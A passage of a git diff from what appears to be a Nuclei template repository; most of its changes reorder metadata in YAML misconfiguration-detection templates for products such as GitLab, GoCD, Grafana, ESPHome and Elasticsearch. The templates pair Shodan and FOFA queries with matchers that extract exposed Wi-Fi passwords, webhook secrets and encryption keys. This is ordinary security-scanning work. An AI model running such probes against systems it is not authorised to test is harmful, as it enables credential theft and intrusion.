- shodan-query: title:"Docmosis Tornado"
- product: tornado
vendor: docmosis
+ product: tornado
+ shodan-query: title:"Docmosis Tornado"
tags: misconfig,tornado,exposure
- classification:
- cpe: cpe:2.3:a:docmosis:tornado:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a0048304602210085196cf99e1013fc3639e0a86644db2cd83ace3fb4d3adf2f7a956b42b38c354022100bc9c821d87d3ccf71f20973763c70a5f0daa357f6a53e17387818f30cc2f0304:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a0048304602210085196cf99e1013fc3639e0a86644db2cd83ace3fb4d3adf2f7a956b42b38c354022100bc9c821d87d3ccf71f20973763c70a5f0daa357f6a53e17387818f30cc2f0304:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml b/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml
index e7d8a3d74c..b082b6f013 100644
--- a/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml
+++ b/http/misconfiguration/drupal/drupal-user-enum-redirect.yaml
@@ -4,16 +4,16 @@ info:
name: Drupal User Enumeration [Redirect]
author: 0w4ys
severity: info
+ classification:
+ cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
- shodan-query: http.component:"Drupal"
- product: drupal
vendor: drupal
+ product: drupal
+ shodan-query: http.component:"Drupal"
tags: drupal,misconfig
- classification:
- cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -41,4 +41,4 @@ http:
regex:
- 'users\/\w+'
-# digest: 4a0a0047304502200de89bdfcb97c4155efda7d3f5205c3f4a69ad3ba6f4fed003236be2c344fdc8022100dae0c0e6ac45c5ff55dede27fe4bddad9ba930e2566f79daa348ae68d5184bec:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502200de89bdfcb97c4155efda7d3f5205c3f4a69ad3ba6f4fed003236be2c344fdc8022100dae0c0e6ac45c5ff55dede27fe4bddad9ba930e2566f79daa348ae68d5184bec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/elasticsearch.yaml b/http/misconfiguration/elasticsearch.yaml
index fa2f2892ac..1a275cf109 100644
--- a/http/misconfiguration/elasticsearch.yaml
+++ b/http/misconfiguration/elasticsearch.yaml
@@ -5,16 +5,16 @@ info:
author: Shine,c-sh0,geeknik
severity: low
description: Internal information is exposed in elasticsearch to external users.
+ classification:
+ cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
- shodan-query: "ElasticSearch"
- product: elasticsearch
vendor: elasticsearch
+ product: elasticsearch
+ shodan-query: "ElasticSearch"
tags: elastic,unauth,elasticsearch,misconfig
- classification:
- cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -52,4 +52,5 @@ http:
group: 1
regex:
- '"number"\s:\s"([0-9.]+)"'
-# digest: 490a0046304402207b44d14688d4487c464122b6e50ecfa3559829942a4dd3bcbe6a74ae7fa56e8d02204fea683b7c3a02f35cc6c012dc4792d3cfd602f30f84b57a8d1aaab32d4ad067:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402207b44d14688d4487c464122b6e50ecfa3559829942a4dd3bcbe6a74ae7fa56e8d02204fea683b7c3a02f35cc6c012dc4792d3cfd602f30f84b57a8d1aaab32d4ad067:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/envoy-admin-exposure.yaml b/http/misconfiguration/envoy-admin-exposure.yaml
index ea0be43e2d..23e8a79321 100644
--- a/http/misconfiguration/envoy-admin-exposure.yaml
+++ b/http/misconfiguration/envoy-admin-exposure.yaml
@@ -7,16 +7,16 @@ info:
description: Envoy Admin page exposed.
reference:
- https://www.envoyproxy.io/docs/envoy/latest/
+ classification:
+ cpe: cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Envoy Admin"
- product: envoy
vendor: envoyproxy
+ product: envoy
+ shodan-query: title:"Envoy Admin"
tags: misconfig,envoy,exposure
- classification:
- cpe: cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +36,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502200730b4d4870c7f30e367b50699bcbd9fe09401983b47158e6e000f12f4f178fe022100ac3d37047f7413c77e9e050d233af8f0433c92f1f4b80cb590a3581ad5bb38ac:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502200730b4d4870c7f30e367b50699bcbd9fe09401983b47158e6e000f12f4f178fe022100ac3d37047f7413c77e9e050d233af8f0433c92f1f4b80cb590a3581ad5bb38ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/esphome-dashboard.yaml b/http/misconfiguration/esphome-dashboard.yaml
index 2e125d431f..b94970e192 100644
--- a/http/misconfiguration/esphome-dashboard.yaml
+++ b/http/misconfiguration/esphome-dashboard.yaml
@@ -6,16 +6,16 @@ info:
severity: medium
description: |
ESPHome Dashboard exposes the secrets like wifi password,api keys and internal logs, it also allows users to make changes through the dashboard.
+ classification:
+ cpe: cpe:2.3:a:esphome:esphome:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Dashboard - ESPHome"
- product: esphome
vendor: esphome
+ product: esphome
+ shodan-query: title:"Dashboard - ESPHome"
tags: misconfig,esphome,exposure,iot
- classification:
- cpe: cpe:2.3:a:esphome:esphome:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,4 @@ http:
status:
- 200
-# digest: 4b0a004830460221008dfb02ec7c1faf58b00a8819d714025454cc3c672237f9cf902fc3d0b453b193022100cf719003994e36b6ef2b0736e2ce738b2406e374ec8c5378b6bfc4d4fe18787f:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221008dfb02ec7c1faf58b00a8819d714025454cc3c672237f9cf902fc3d0b453b193022100cf719003994e36b6ef2b0736e2ce738b2406e374ec8c5378b6bfc4d4fe18787f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/everything-listing.yaml b/http/misconfiguration/everything-listing.yaml
index f1f1cfe49f..10c39679aa 100644
--- a/http/misconfiguration/everything-listing.yaml
+++ b/http/misconfiguration/everything-listing.yaml
@@ -8,16 +8,16 @@ info:
Everything is a freeware desktop search utility for Windows that can rapidly find files and folders by name.
reference:
- https://www.voidtools.com/
+ classification:
+ cpe: cpe:2.3:a:voidtools:everything:*:*:*:*:*:*:*:*
metadata:
verified: 'true'
max-request: 1
- shodan-query: http.favicon.hash:-977323269
- product: everything
vendor: voidtools
+ product: everything
+ shodan-query: http.favicon.hash:-977323269
tags: exposure,everything,listing,voidtools,misconfig
- classification:
- cpe: cpe:2.3:a:voidtools:everything:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,4 @@ http:
status:
- 200
-# digest: 4a0a00473045022079110f4ab115a14607c2b614e6c87b6ec9573a1644682e3b60d707d812835118022100f7b5f3d3cf5b49015d6a2c395406891b6b7976d6a98de0d571542ada593b8e13:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022079110f4ab115a14607c2b614e6c87b6ec9573a1644682e3b60d707d812835118022100f7b5f3d3cf5b49015d6a2c395406891b6b7976d6a98de0d571542ada593b8e13:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/feiyuxing-info-leak.yaml b/http/misconfiguration/feiyuxing-info-leak.yaml
index defed9ac49..bdf49a2e17 100644
--- a/http/misconfiguration/feiyuxing-info-leak.yaml
+++ b/http/misconfiguration/feiyuxing-info-leak.yaml
@@ -10,16 +10,16 @@ info:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E9%A3%9E%E9%B1%BC%E6%98%9F/%E9%A3%9E%E9%B1%BC%E6%98%9F%20%E4%BC%81%E4%B8%9A%E7%BA%A7%E6%99%BA%E8%83%BD%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
- https://github.com/hktalent/scan4all/blob/main/lib/goby/goby_pocs/Adslr_Enterprise_online_behavior_management_system_Information_leakage.json
- https://github.com/Threekiii/Awesome-POC/blob/master/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%A3%9E%E9%B1%BC%E6%98%9F%20%E4%BC%81%E4%B8%9A%E7%BA%A7%E6%99%BA%E8%83%BD%E4%B8%8A%E7%BD%91%E8%A1%8C%E4%B8%BA%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.md
+ classification:
+ cpe: cpe:2.3:o:feiyuxing:vec40g_firmware:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
- fofa-query: title="飞鱼星企业级智能上网行为管理系统"
- product: vec40g_firmware
vendor: feiyuxing
+ product: vec40g_firmware
+ fofa-query: title="飞鱼星企业级智能上网行为管理系统"
tags: misconfig,exposure,iot,wpa,wpa2
- classification:
- cpe: cpe:2.3:o:feiyuxing:vec40g_firmware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -39,4 +39,4 @@ http:
regex:
- "\"wl_passwd_5g\":\"(.*?)\""
-# digest: 4a0a00473045022024def7c98d8c3f84bff3da5bf59a7e7cc750b32574590afd4a3d7c5e0d7b8499022100be2b6cec86528d1cbdd6ea782fb9e2bc4be2b9a123562a00dbd1583b884faf21:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022024def7c98d8c3f84bff3da5bf59a7e7cc750b32574590afd4a3d7c5e0d7b8499022100be2b6cec86528d1cbdd6ea782fb9e2bc4be2b9a123562a00dbd1583b884faf21:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/freshrss-unauth.yaml b/http/misconfiguration/freshrss-unauth.yaml
index 0f9e8f51d6..c3e9adb081 100644
--- a/http/misconfiguration/freshrss-unauth.yaml
+++ b/http/misconfiguration/freshrss-unauth.yaml
@@ -6,16 +6,16 @@ info:
severity: high
description: |
Freshrss Admin Dashboard has been exposed.
- metadata:
- max-request: 1
- verified: true
- shodan-query: title:"Freshrss"
- product: freshrss
- vendor: freshrss
- tags: freshrss,misconfig,unauth,exposed
-
classification:
cpe: cpe:2.3:a:freshrss:freshrss:*:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: freshrss
+ product: freshrss
+ shodan-query: title:"Freshrss"
+ tags: freshrss,misconfig,unauth,exposed
+
http:
- method: GET
path:
@@ -34,4 +34,5 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220711bbfdcea48f25f55e1465d58bfd13ab15e3e265a3435e2e0c4eb6f05333ca502201aea2a64cb3967574dcca15eb39690a94c8a775529bc1de47ca4820df7f6f2ad:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220711bbfdcea48f25f55e1465d58bfd13ab15e3e265a3435e2e0c4eb6f05333ca502201aea2a64cb3967574dcca15eb39690a94c8a775529bc1de47ca4820df7f6f2ad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/fusionauth-admin-setup.yaml b/http/misconfiguration/fusionauth-admin-setup.yaml
index fa94fa0970..f496c6fddd 100644
--- a/http/misconfiguration/fusionauth-admin-setup.yaml
+++ b/http/misconfiguration/fusionauth-admin-setup.yaml
@@ -5,17 +5,17 @@ info:
author: ritikchaddha
severity: high
description: FusionAuth Admin Setup is exposed.
+ classification:
+ cpe: cpe:2.3:a:fusionauth:fusionauth:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
+ vendor: fusionauth
+ product: fusionauth
shodan-query: title:"FusionAuth Setup Wizard"
fofa-query: title="FusionAuth Setup Wizard"
- product: fusionauth
- vendor: fusionauth
tags: misconfig,fusionauth,admin,setup
- classification:
- cpe: cpe:2.3:a:fusionauth:fusionauth:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +32,5 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022007d4dbb8a296fe926e5f296078aecfd6e737a4478b5ce8761f2de44c8620c953022018807ad838fddfa4096e7915fccf574e67b1c1b935d5c10d07082af0640b8632:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022007d4dbb8a296fe926e5f296078aecfd6e737a4478b5ce8761f2de44c8620c953022018807ad838fddfa4096e7915fccf574e67b1c1b935d5c10d07082af0640b8632:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/ganglia-cluster-dashboard.yaml b/http/misconfiguration/ganglia-cluster-dashboard.yaml
index 67104edb8d..dbdedb4b73 100644
--- a/http/misconfiguration/ganglia-cluster-dashboard.yaml
+++ b/http/misconfiguration/ganglia-cluster-dashboard.yaml
@@ -6,16 +6,16 @@ info:
severity: low
description: |
Ganglia Cluster dashboard was detected.
+ classification:
+ cpe: cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
- shodan-query: html:"ganglia_form.submit()"
- product: ganglia-web
vendor: ganglia
+ product: ganglia-web
+ shodan-query: html:"ganglia_form.submit()"
tags: misconfig,ganglia,dashboard
- classification:
- cpe: cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -35,4 +35,4 @@ http:
status:
- 200
-# digest: 4b0a00483046022100d876d2fca5590cc09d31a44355985f6ff6ea31ce2d28eff4ecd44fe31dc885450221008a3efcbfeefdd8048c364dadff65adfee39c81ed5a7540a9bd5e366bcce4e453:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100d876d2fca5590cc09d31a44355985f6ff6ea31ce2d28eff4ecd44fe31dc885450221008a3efcbfeefdd8048c364dadff65adfee39c81ed5a7540a9bd5e366bcce4e453:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/git-web-interface.yaml b/http/misconfiguration/git-web-interface.yaml
index 8b66874bf0..56af8a2970 100644
--- a/http/misconfiguration/git-web-interface.yaml
+++ b/http/misconfiguration/git-web-interface.yaml
@@ -5,15 +5,15 @@ info:
author: dhiyaneshDK
severity: low
description: Git Web Interface is exposed.
- metadata:
- max-request: 1
- shodan-query: html:"git web interface version"
- product: git
- vendor: git-scm
- tags: git,misconfig
-
classification:
cpe: cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: git-scm
+ product: git
+ shodan-query: html:"git web interface version"
+ tags: git,misconfig
+
http:
- method: GET
path:
@@ -28,4 +28,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220403c31aafe58705c14121b826ac2d6a13d267dfbb5355ad61b8210fd16ffa186022100a2454f0fca7cfcde9de095c333f15e42d0a55bf9d93a8ee20a169302402d9422:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450220403c31aafe58705c14121b826ac2d6a13d267dfbb5355ad61b8210fd16ffa186022100a2454f0fca7cfcde9de095c333f15e42d0a55bf9d93a8ee20a169302402d9422:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/gitea-public-signup.yaml b/http/misconfiguration/gitea-public-signup.yaml
index 2fa7a013bd..c346e462ad 100644
--- a/http/misconfiguration/gitea-public-signup.yaml
+++ b/http/misconfiguration/gitea-public-signup.yaml
@@ -9,16 +9,16 @@ info:
reference:
- https://www.youtube.com/watch?v=oHhofSj9lEM&t=157s
- https://gitea.io/en-us/
+ classification:
+ cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: html:"Powered by Gitea"
- product: gitea
vendor: gitea
+ product: gitea
+ shodan-query: html:"Powered by Gitea"
tags: misconfig,gitea
- classification:
- cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -41,4 +41,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100c36a1791582268e8b3a23df0696ff11d3112806c7c12c646b10ca49fe148f06f02206c39ee25b316e1041ed0c00c3381f1a9be432515ec5b2085dbd0649fb236d8ec:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100c36a1791582268e8b3a23df0696ff11d3112806c7c12c646b10ca49fe148f06f02206c39ee25b316e1041ed0c00c3381f1a9be432515ec5b2085dbd0649fb236d8ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/gitlab/gitlab-public-repos.yaml b/http/misconfiguration/gitlab/gitlab-public-repos.yaml
index 1457c855c7..4d2d1a80e2 100644
--- a/http/misconfiguration/gitlab/gitlab-public-repos.yaml
+++ b/http/misconfiguration/gitlab/gitlab-public-repos.yaml
@@ -7,15 +7,15 @@ info:
reference:
- https://twitter.com/ldionmarcil/status/1370052344562470922
- https://github.com/ldionmarcil/gitlab-unauth-parser
- metadata:
- max-request: 1
- shodan-query: http.title:"GitLab"
- product: gitlab
- vendor: gitlab
- tags: gitlab,exposure,misconfig
-
classification:
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: gitlab
+ product: gitlab
+ shodan-query: http.title:"GitLab"
+ tags: gitlab,exposure,misconfig
+
http:
- method: GET
path:
@@ -36,4 +36,4 @@ http:
words:
- "name_with_namespace"
-# digest: 4b0a00483046022100db1456b7621cff9a0e9b23cec256889e1b2105c58ea97aaeaf719f1403c36ce7022100b8eb7341c2599e8983388219ce5c1cfa516e1b1895649d49186e795b14f052b5:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100db1456b7621cff9a0e9b23cec256889e1b2105c58ea97aaeaf719f1403c36ce7022100b8eb7341c2599e8983388219ce5c1cfa516e1b1895649d49186e795b14f052b5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/gitlab/gitlab-public-signup.yaml b/http/misconfiguration/gitlab/gitlab-public-signup.yaml
index 81072f95b4..85fc5bcf31 100644
--- a/http/misconfiguration/gitlab/gitlab-public-signup.yaml
+++ b/http/misconfiguration/gitlab/gitlab-public-signup.yaml
@@ -4,15 +4,15 @@ info:
name: GitLab public signup
author: pdteam,axrk
severity: info
- metadata:
- max-request: 2
- shodan-query: http.title:"GitLab"
- product: gitlab
- vendor: gitlab
- tags: gitlab,misconfig
-
classification:
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ vendor: gitlab
+ product: gitlab
+ shodan-query: http.title:"GitLab"
+ tags: gitlab,misconfig
+
http:
- method: GET
path:
@@ -20,6 +20,7 @@ http:
- "{{BaseURL}}/users/sign_up"
stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: word
@@ -39,4 +40,5 @@ http:
negative: true
words:
- ''
-# digest: 4b0a00483046022100c7b6ba5ffe70452a7ec5263ab9276d0684c0ff800c028be0e74c5c8000852a90022100917c7b6b75a09d28467faef842e3236446f39d0908cd4818a3986ae4dd6d393e:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100c7b6ba5ffe70452a7ec5263ab9276d0684c0ff800c028be0e74c5c8000852a90022100917c7b6b75a09d28467faef842e3236446f39d0908cd4818a3986ae4dd6d393e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/gitlist-disclosure.yaml b/http/misconfiguration/gitlist-disclosure.yaml
index f24c71a1a2..0595ac3a9d 100644
--- a/http/misconfiguration/gitlist-disclosure.yaml
+++ b/http/misconfiguration/gitlist-disclosure.yaml
@@ -5,15 +5,15 @@ info:
author: dhiyaneshDK
severity: low
description: GitList is exposed.
- metadata:
- max-request: 1
- shodan-query: title:"GitList"
- product: gitlist
- vendor: gitlist
- tags: gitlist,misconfig
-
classification:
cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: gitlist
+ product: gitlist
+ shodan-query: title:"GitList"
+ tags: gitlist,misconfig
+
http:
- method: GET
path:
@@ -28,4 +28,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100c246a38f6aae9fe626cd123a9f8bb5360f0cb00262758d307b7d89bace70144e022100cd1fc6b9458ab883a169bb2e25a827ddade8be40c96b85c0285cc3e970d3727d:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100c246a38f6aae9fe626cd123a9f8bb5360f0cb00262758d307b7d89bace70144e022100cd1fc6b9458ab883a169bb2e25a827ddade8be40c96b85c0285cc3e970d3727d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/global-traffic-statistics.yaml b/http/misconfiguration/global-traffic-statistics.yaml
index 710507666f..5cb84dc370 100644
--- a/http/misconfiguration/global-traffic-statistics.yaml
+++ b/http/misconfiguration/global-traffic-statistics.yaml
@@ -5,16 +5,16 @@ info:
author: tess
severity: low
description: Global Traffic Statistics page is exposed.
+ classification:
+ cpe: cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"Global Traffic Statistics"
- product: big-ip_global_traffic_manager
vendor: f5
+ product: big-ip_global_traffic_manager
+ shodan-query: title:"Global Traffic Statistics"
tags: misconfig,global,exposure
- classification:
- cpe: cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100b775c84757259afdec43240a6f466e603c875bbc31415430559909a3f0c56e990220618c12727384029710c17534b61fad1cd778ea74c0df124e9e72b1993f7ce043:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100b775c84757259afdec43240a6f466e603c875bbc31415430559909a3f0c56e990220618c12727384029710c17534b61fad1cd778ea74c0df124e9e72b1993f7ce043:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml
index e4f3b4ffaf..cd767b384c 100644
--- a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml
+++ b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml
@@ -9,15 +9,15 @@ info:
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
- metadata:
- max-request: 1
- shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
- product: gocd
- vendor: thoughtworks
- tags: go,gocd,config,exposure,misconfig
-
classification:
cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: thoughtworks
+ product: gocd
+ shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
+ tags: go,gocd,config,exposure,misconfig
+
http:
- method: GET
path:
@@ -35,4 +35,5 @@ http:
- "webhookSecret"
- "tokenGenerationKey"
condition: and
-# digest: 4a0a00473045022100ac29afb87fd8ac872a0f7b942535bb3bf817074b934908847e337261e4192e3b022032bf9074f738ea01957b605f5c88f68efad27b85ab8d69ecb23fc5d0b0f73193:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100ac29afb87fd8ac872a0f7b942535bb3bf817074b934908847e337261e4192e3b022032bf9074f738ea01957b605f5c88f68efad27b85ab8d69ecb23fc5d0b0f73193:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/gocd/gocd-encryption-key.yaml b/http/misconfiguration/gocd/gocd-encryption-key.yaml
index 75e0581ff4..f71a485c98 100644
--- a/http/misconfiguration/gocd/gocd-encryption-key.yaml
+++ b/http/misconfiguration/gocd/gocd-encryption-key.yaml
@@ -9,15 +9,15 @@ info:
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
- metadata:
- max-request: 1
- shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
- product: gocd
- vendor: thoughtworks
- tags: go,gocd,exposure,misconfig
-
classification:
cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: thoughtworks
+ product: gocd
+ shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
+ tags: go,gocd,exposure,misconfig
+
http:
- method: GET
path:
@@ -42,4 +42,5 @@ http:
- type: regex
regex:
- "([a-z0-9]){32}"
-# digest: 4a0a00473045022100c33be8766bce2376dde66ff40c65f89225bdfa03a076007034b7174095a9912e022014b9097f6923389b114d20dbe98e44d2644c12971b4c29dc9800e6046b1a9373:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100c33be8766bce2376dde66ff40c65f89225bdfa03a076007034b7174095a9912e022014b9097f6923389b114d20dbe98e44d2644c12971b4c29dc9800e6046b1a9373:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml
index 60973648ae..cfcbf85ee5 100644
--- a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml
+++ b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml
@@ -5,15 +5,15 @@ info:
author: dhiyaneshDk
severity: medium
description: GoCd Dashboard is exposed.
- metadata:
- max-request: 1
- shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
- product: gocd
- vendor: thoughtworks
- tags: go,gocd,unauth,misconfig
-
classification:
cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: thoughtworks
+ product: gocd
+ shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version"
+ tags: go,gocd,unauth,misconfig
+
http:
- method: GET
path:
@@ -33,4 +33,5 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502205138b757ccc0742d887b97717a06383dd5ccfe5f0394ff3c193c4be652028887022100b791a416ff7c1da55813e25fbaed8b33cc7cc08e1d599a7a1bd42f10131ffacc:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502205138b757ccc0742d887b97717a06383dd5ccfe5f0394ff3c193c4be652028887022100b791a416ff7c1da55813e25fbaed8b33cc7cc08e1d599a7a1bd42f10131ffacc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/grafana-public-signup.yaml b/http/misconfiguration/grafana-public-signup.yaml
index 86ff9ab4bf..4ba86ceb18 100644
--- a/http/misconfiguration/grafana-public-signup.yaml
+++ b/http/misconfiguration/grafana-public-signup.yaml
@@ -5,15 +5,15 @@ info:
author: pdteam
severity: medium
description: Public Signup is enabled on Grafana.
- metadata:
- max-request: 1
- shodan-query: title:"Grafana"
- product: grafana
- vendor: grafana
- tags: grafana,intrusive,misconfig
-
classification:
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: grafana
+ product: grafana
+ shodan-query: title:"Grafana"
+ tags: grafana,intrusive,misconfig
+
http:
- raw:
- |
@@ -41,4 +41,5 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100cd9ddfa8c2baf843acc831480d26b30f6b6def4ceea41aa31c1d77cfc01ff8c40221009ca95c5f33cc23f93870f8fd3732b58e09571c68925449b31fcebdc136fb8e32:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100cd9ddfa8c2baf843acc831480d26b30f6b6def4ceea41aa31c1d77cfc01ff8c40221009ca95c5f33cc23f93870f8fd3732b58e09571c68925449b31fcebdc136fb8e32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/misconfiguration/graphql/graphql-playground.yaml b/http/misconfiguration/graphql/graphql-playground.yaml
index 8ae3d478b6..fa8ccc07a1 100644
--- a/http/misconfiguration/graphql/graphql-playground.yaml
+++ b/http/misconfiguration/graphql/graphql-playground.yaml
@@ -6,16 +6,16 @@ info:
severity: unknown
reference:
- https://github.com/graphql/graphql-playground
+ classification:
+ cpe: cpe:2.3:a:graphql:playground:*:*:*:*:node.js:*:*:*
metadata:
verified: true
max-request: 1
- shodan-query: title:"GraphQL Playground"
- product: playground
vendor: graphql
+ product: playground
+ shodan-query: title:"GraphQL Playground"
tags: misconfig,graphql
- classification:
- cpe: cpe:2.3:a:graphql:playground:*:*:*:*:node.js:*:*:*
http:
- method: GET
path:
@@ -37,4 +37,4 @@ http:
status:
- 200
-# digest: 4a0a0047304502202d61741c08f70714d01c829cdb9e46bca026f4fbb12a2d340e5f22c6a9f8db1d022100be0f2a08785ef366f0cfa8f4cd9be3c27edb8f4f65f4fbd5316fe18662a3c664:922c64590222798bb761d5b6d8e72950
